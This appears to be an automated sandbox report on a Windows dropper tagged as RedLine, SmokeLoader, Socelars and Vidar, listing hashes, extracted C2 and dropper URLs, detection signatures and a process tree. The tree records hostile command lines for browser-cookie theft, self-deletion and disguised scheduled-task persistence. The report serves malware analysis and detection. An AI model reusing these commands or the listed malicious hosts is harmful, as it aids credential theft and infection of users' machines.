redline | a282005eef80a8f19035835337c495306785cd4b6452cff47ea42c89e32f2001

Analysis

max time kernel
12s
max time network
162s
platform
windows10_x64
resource
win10v20210410
submitted
14/08/2021, 00:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a128c5bc0609f0871555f4e66bb19717.exe
Size

3.3MB
MD5

a128c5bc0609f0871555f4e66bb19717
SHA1

3b7c2d36a7bd94d6d57c73a1dbfd783948422979
SHA256

a282005eef80a8f19035835337c495306785cd4b6452cff47ea42c89e32f2001
SHA512

328faa0446b56613df66824e4e43a6f6e7e9d093d088433d84f9bf993610c3d40962d5c57cdeec79beda32971c0ff3274d61dba1fcbb424b813edc43e327d031

Score

10^/10

redline smokeloader socelars vidar 706 916 937 aspackv2 backdoor evasion infostealer persistence spyware stealer suricata trojan vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

vidar

Version

Botnet

706

https://lenak513.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

vidar

Version

Botnet

916

https://lenak513.tumblr.com/

Attributes

profile_id
916

Extracted

Family

vidar

Version

Botnet

937

https://lenak513.tumblr.com/

Attributes

profile_id
937

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5832	3516	rundll32.exe	13
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6680	3516	rundll32.exe	13

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

resource	yara_rule
behavioral2/memory/4480-277-0x00000000077B0000-0x00000000077E2000-memory.dmp	family_redline
behavioral2/memory/4532-280-0x0000000005450000-0x0000000005482000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00040000000155fd-263.dat	family_socelars
behavioral2/files/0x00040000000155fd-262.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Unknown - Loader - Check .exe Updated
suricata: ET MALWARE Unknown - Loader - Check .exe Updated
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata

Vidar Stealer 6 IoCs

stealer

resource	yara_rule
behavioral2/memory/2480-203-0x0000000000B30000-0x0000000000BCD000-memory.dmp	family_vidar
behavioral2/memory/2480-205-0x0000000000400000-0x000000000095B000-memory.dmp	family_vidar
behavioral2/memory/204-340-0x0000000004990000-0x0000000004A2D000-memory.dmp	family_vidar
behavioral2/memory/4764-342-0x00000000049C0000-0x0000000004A5D000-memory.dmp	family_vidar
behavioral2/memory/204-359-0x0000000000400000-0x0000000002D17000-memory.dmp	family_vidar
behavioral2/memory/4764-363-0x0000000000400000-0x0000000002D16000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000100000001ab94-122.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab94-124.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab93-123.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab93-127.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab93-128.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab96-129.dat	aspack_v212_v242
behavioral2/files/0x000100000001ab96-126.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 26 IoCs

pid	Process
1704	setup_installer.exe
2244	setup_install.exe
3948	6f0ef9103.exe
2064	30dd64a3b09404.exe
2348	a6d6262485.exe
1380	c65040c72c7.exe
2284	cb4071ec97a2.exe
2480	ed10a8b2b3d6.exe
2500	757755d929c68.exe
3148	29dc9096b9.exe
2624	a6d6262485.tmp
2196	cb4071ec97a2.exe
4216	LzmwAqmV.exe
4356	1642518.exe
4416	6326952.exe
4480	6493146.exe
4532	6911857.exe
4620	5323963.exe
4708	Chrome 5.exe
4856	1.exe
4964	2.exe
4976	WinHoster.exe
5076	3.exe
4136	4.exe
2968	5.exe
4368	6.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/files/0x000100000001ab9a-151.dat	vmprotect
behavioral2/memory/3948-169-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
behavioral2/files/0x000100000001ab9a-150.dat	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	30dd64a3b09404.exe

Loads dropped DLL 10 IoCs

pid	Process
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2244	setup_install.exe
2624	a6d6262485.tmp
2624	a6d6262485.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6326952.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
191	ip-api.com
192	ipinfo.io
200	ipinfo.io
19	ipinfo.io
25	ipinfo.io
40	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 37 IoCs

pid	pid_target	Process	procid_target
5856	4136	WerFault.exe	118
5224	4240	WerFault.exe	125
5316	204	WerFault.exe	122
3424	4136	WerFault.exe	118
5556	4764	WerFault.exe	126
5780	4136	WerFault.exe	118
1856	4764	WerFault.exe	126
1340	204	WerFault.exe	122
5556	4136	WerFault.exe	118
5480	4764	WerFault.exe	126
5220	204	WerFault.exe	122
2476	4136	WerFault.exe	118
2504	4764	WerFault.exe	126
6008	204	WerFault.exe	122
6032	5736	WerFault.exe	156
5448	204	WerFault.exe	122
5748	4136	WerFault.exe	118
3780	5736	WerFault.exe	156
3660	204	WerFault.exe	122
6008	4136	WerFault.exe	118
1140	204	WerFault.exe	122
6136	4764	WerFault.exe	126
4560	4136	WerFault.exe	118
1568	5736	WerFault.exe	156
6460	5736	WerFault.exe	156
6452	204	WerFault.exe	122
6444	4764	WerFault.exe	126
6724	204	WerFault.exe	122
6804	5736	WerFault.exe	156
6988	204	WerFault.exe	122
7084	5736	WerFault.exe	156
7128	4164	WerFault.exe	119
6424	5736	WerFault.exe	156
6708	4136	WerFault.exe	118
6732	5736	WerFault.exe	156
5532	4136	WerFault.exe	118
4904	4136	WerFault.exe	118

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c65040c72c7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c65040c72c7.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c65040c72c7.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2380	schtasks.exe
6440	schtasks.exe
7816	schtasks.exe
8008	schtasks.exe
7580	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
6272	timeout.exe
7388	timeout.exe
7544	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6504	taskkill.exe
6716	taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4880	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	195	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	206	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
1380	c65040c72c7.exe
1380	c65040c72c7.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe
2064	30dd64a3b09404.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	757755d929c68.exe
Token: SeDebugPrivilege	3148	29dc9096b9.exe
Token: SeDebugPrivilege	4356	1642518.exe
Token: SeCreateTokenPrivilege	4964	2.exe
Token: SeAssignPrimaryTokenPrivilege	4964	2.exe
Token: SeLockMemoryPrivilege	4964	2.exe
Token: SeIncreaseQuotaPrivilege	4964	2.exe
Token: SeMachineAccountPrivilege	4964	2.exe
Token: SeTcbPrivilege	4964	2.exe
Token: SeSecurityPrivilege	4964	2.exe
Token: SeTakeOwnershipPrivilege	4964	2.exe
Token: SeLoadDriverPrivilege	4964	2.exe
Token: SeSystemProfilePrivilege	4964	2.exe
Token: SeSystemtimePrivilege	4964	2.exe
Token: SeProfSingleProcessPrivilege	4964	2.exe
Token: SeIncBasePriorityPrivilege	4964	2.exe
Token: SeCreatePagefilePrivilege	4964	2.exe
Token: SeCreatePermanentPrivilege	4964	2.exe
Token: SeBackupPrivilege	4964	2.exe
Token: SeRestorePrivilege	4964	2.exe
Token: SeShutdownPrivilege	4964	2.exe
Token: SeDebugPrivilege	4964	2.exe
Token: SeAuditPrivilege	4964	2.exe
Token: SeSystemEnvironmentPrivilege	4964	2.exe
Token: SeChangeNotifyPrivilege	4964	2.exe
Token: SeRemoteShutdownPrivilege	4964	2.exe
Token: SeUndockPrivilege	4964	2.exe
Token: SeSyncAgentPrivilege	4964	2.exe
Token: SeEnableDelegationPrivilege	4964	2.exe
Token: SeManageVolumePrivilege	4964	2.exe
Token: SeImpersonatePrivilege	4964	2.exe
Token: SeCreateGlobalPrivilege	4964	2.exe
Token: 31	4964	2.exe
Token: 32	4964	2.exe
Token: 33	4964	2.exe
Token: 34	4964	2.exe
Token: 35	4964	2.exe
Token: SeDebugPrivilege	4620	5323963.exe
Token: SeDebugPrivilege	5076	3.exe
Token: SeDebugPrivilege	4856	1.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2624	a6d6262485.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3212 wrote to memory of 1704	3212	a128c5bc0609f0871555f4e66bb19717.exe	76
PID 3212 wrote to memory of 1704	3212	a128c5bc0609f0871555f4e66bb19717.exe	76
PID 3212 wrote to memory of 1704	3212	a128c5bc0609f0871555f4e66bb19717.exe	76
PID 1704 wrote to memory of 2244	1704	setup_installer.exe	77
PID 1704 wrote to memory of 2244	1704	setup_installer.exe	77
PID 1704 wrote to memory of 2244	1704	setup_installer.exe	77
PID 2244 wrote to memory of 2728	2244	setup_install.exe	80
PID 2244 wrote to memory of 2728	2244	setup_install.exe	80
PID 2244 wrote to memory of 2728	2244	setup_install.exe	80
PID 2244 wrote to memory of 3960	2244	setup_install.exe	81
PID 2244 wrote to memory of 3960	2244	setup_install.exe	81
PID 2244 wrote to memory of 3960	2244	setup_install.exe	81
PID 2244 wrote to memory of 4016	2244	setup_install.exe	82
PID 2244 wrote to memory of 4016	2244	setup_install.exe	82
PID 2244 wrote to memory of 4016	2244	setup_install.exe	82
PID 2244 wrote to memory of 2120	2244	setup_install.exe	88
PID 2244 wrote to memory of 2120	2244	setup_install.exe	88
PID 2244 wrote to memory of 2120	2244	setup_install.exe	88
PID 2244 wrote to memory of 3324	2244	setup_install.exe	83
PID 2244 wrote to memory of 3324	2244	setup_install.exe	83
PID 2244 wrote to memory of 3324	2244	setup_install.exe	83
PID 2244 wrote to memory of 3292	2244	setup_install.exe	84
PID 2244 wrote to memory of 3292	2244	setup_install.exe	84
PID 2244 wrote to memory of 3292	2244	setup_install.exe	84
PID 2244 wrote to memory of 740	2244	setup_install.exe	87
PID 2244 wrote to memory of 740	2244	setup_install.exe	87
PID 2244 wrote to memory of 740	2244	setup_install.exe	87
PID 2244 wrote to memory of 1172	2244	setup_install.exe	85
PID 2244 wrote to memory of 1172	2244	setup_install.exe	85
PID 2244 wrote to memory of 1172	2244	setup_install.exe	85
PID 2244 wrote to memory of 1304	2244	setup_install.exe	86
PID 2244 wrote to memory of 1304	2244	setup_install.exe	86
PID 2244 wrote to memory of 1304	2244	setup_install.exe	86
PID 4016 wrote to memory of 2064	4016	cmd.exe	90
PID 4016 wrote to memory of 2064	4016	cmd.exe	90
PID 4016 wrote to memory of 2064	4016	cmd.exe	90
PID 2120 wrote to memory of 3948	2120	cmd.exe	89
PID 2120 wrote to memory of 3948	2120	cmd.exe	89
PID 2120 wrote to memory of 3948	2120	cmd.exe	89
PID 3324 wrote to memory of 2348	3324	cmd.exe	100
PID 3324 wrote to memory of 2348	3324	cmd.exe	100
PID 3324 wrote to memory of 2348	3324	cmd.exe	100
PID 3292 wrote to memory of 1380	3292	cmd.exe	99
PID 3292 wrote to memory of 1380	3292	cmd.exe	99
PID 3292 wrote to memory of 1380	3292	cmd.exe	99
PID 3960 wrote to memory of 2284	3960	cmd.exe	91
PID 3960 wrote to memory of 2284	3960	cmd.exe	91
PID 3960 wrote to memory of 2284	3960	cmd.exe	91
PID 740 wrote to memory of 2480	740	cmd.exe	97
PID 740 wrote to memory of 2480	740	cmd.exe	97
PID 740 wrote to memory of 2480	740	cmd.exe	97
PID 1172 wrote to memory of 2500	1172	cmd.exe	92
PID 1172 wrote to memory of 2500	1172	cmd.exe	92
PID 1304 wrote to memory of 3148	1304	cmd.exe	96
PID 1304 wrote to memory of 3148	1304	cmd.exe	96
PID 2348 wrote to memory of 2624	2348	a6d6262485.exe	93
PID 2348 wrote to memory of 2624	2348	a6d6262485.exe	93
PID 2348 wrote to memory of 2624	2348	a6d6262485.exe	93
PID 2500 wrote to memory of 4216	2500	757755d929c68.exe	98
PID 2500 wrote to memory of 4216	2500	757755d929c68.exe	98
PID 2500 wrote to memory of 4216	2500	757755d929c68.exe	98
PID 3148 wrote to memory of 4356	3148	29dc9096b9.exe	101
PID 3148 wrote to memory of 4356	3148	29dc9096b9.exe	101
PID 3148 wrote to memory of 4416	3148	29dc9096b9.exe	102

C:\Users\Admin\AppData\Local\Temp\a128c5bc0609f0871555f4e66bb19717.exe
"C:\Users\Admin\AppData\Local\Temp\a128c5bc0609f0871555f4e66bb19717.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME11.exe
      4⤵
      PID:2728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cb4071ec97a2.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\cb4071ec97a2.exe
        
        cb4071ec97a2.exe
        5⤵
        Executes dropped EXE
        
        PID:2284
      - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\cb4071ec97a2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\cb4071ec97a2.exe" -a
        6⤵
        Executes dropped EXE
        
        PID:2196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 30dd64a3b09404.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4016
    - - C:\Users\Admin\AppData\Local\Temp\7zS8A6BE444\30dd64a3b09404.exe
        
        30dd64a3b09404.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:2064
      - C:\Users\Admin\Documents\8mAdeMr9sMdQkjO8zIOnat42.exe
        
        "C:\Users\Admin\Documents\8mAdeMr9sMdQkjO8zIOnat42.exe"
        6⤵
        
        PID:976
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\8mAdeMr9sMdQkjO8zIOnat42.exe"
        7⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        8⤵
        Delays execution with timeout.exe
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\0daFwwflN0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0daFwwflN0.exe"
        7⤵
        
        PID:4148
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        8⤵
        Creates scheduled task(s)
        
        PID:6440
      - C:\Users\Admin\Documents\xgQy9Xqwz2D_OLNULR_T4HUf.exe
        
        "C:\Users\Admin\Documents\xgQy9Xqwz2D_OLNULR_T4HUf.exe"
        6⤵
        
        PID:204
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 760
        7⤵
        Program crash
        
        PID:5316
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 812
        7⤵
        Program crash
        
        PID:1340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 792
        7⤵
        Program crash
        
        PID:5220
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 852
        7⤵
        Program crash
        
        PID:6008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 956
        7⤵
        Program crash
        
        PID:5448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 984
        7⤵
        Program crash
        
        PID:3660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1048
        7⤵
        Program crash
        
        PID:1140
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1028
        7⤵
        Program crash
        
        PID:6452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1520
        7⤵
        Program crash
        
        PID:6724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 204 -s 1596
        7⤵
        Program crash
        
        PID:6988
      - C:\Users\Admin\Documents\J044GfwkAKkZc8wHbv9YcOB9.exe
        
        "C:\Users\Admin\Documents\J044GfwkAKkZc8wHbv9YcOB9.exe"
        6⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        7⤵
        
        PID:5072
      - C:\Users\Admin\Documents\7ORakC6ErF6FIDbezAfoevkf.exe
        
        "C:\Users\Admin\Documents\7ORakC6ErF6FIDbezAfoevkf.exe"
        6⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 480
        7⤵
        Program crash
        
        PID:5224
      - C:\Users\Admin\Documents\frSPUYhlVrEvawc2B8b3SMmm.exe
        
        "C:\Users\Admin\Documents\frSPUYhlVrEvawc2B8b3SMmm.exe"
        6⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 760
        7⤵
        Program crash
        
        PID:5556
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 812
        7⤵
        Program crash
        
        PID:1856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 848
        7⤵
        Program crash
        
        PID:5480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 956
        7⤵
        Program crash
        
        PID:2504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1444
        7⤵
        Program crash
        
        PID:6136
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1544
        7⤵
        Program crash
        
        PID:6444
      - C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe
        
        "C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe"
        6⤵
        
        PID:2076
        
        C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe
        
        "C:\Users\Admin\Documents\8WmN4PFYSaGwkvgq1j3rBgnt.exe"
        7⤵
        
        PID:5812
      - C:\Users\Admin\Documents\XjbzFuKtFijO9hBtjL9Vax8g.exe
        
        "C:\Users\Admin\Documents\XjbzFuKtFijO9hBtjL9Vax8g.exe"
        6⤵
        
        PID:5392
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        
        PID:5984
        
        C:\Program Files (x86)\Company\NewProduct\customer3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
        7⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6244
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe
        
        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
        8⤵
        
        PID:4500
        
        C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        7⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6048
      - C:\Users\Admin\Documents\oUsTidh7k4drKKtjjcZHyZ1S.exe
        
        "C:\Users\Admin\Documents\oUsTidh7k4drKKtjjcZHyZ1S.exe"
        6⤵
        
        PID:5532
        
        C:\Users\Admin\AppData\Roaming\4888560.exe
        
        "C:\Users\Admin\AppData\Roaming\4888560.exe"
        7⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Roaming\5307270.exe
        
        "C:\Users\Admin\AppData\Roaming\5307270.exe"
        7⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Roaming\4862144.exe
        
        "C:\Users\Admin\AppData\Roaming\4862144.exe"
        7⤵
        
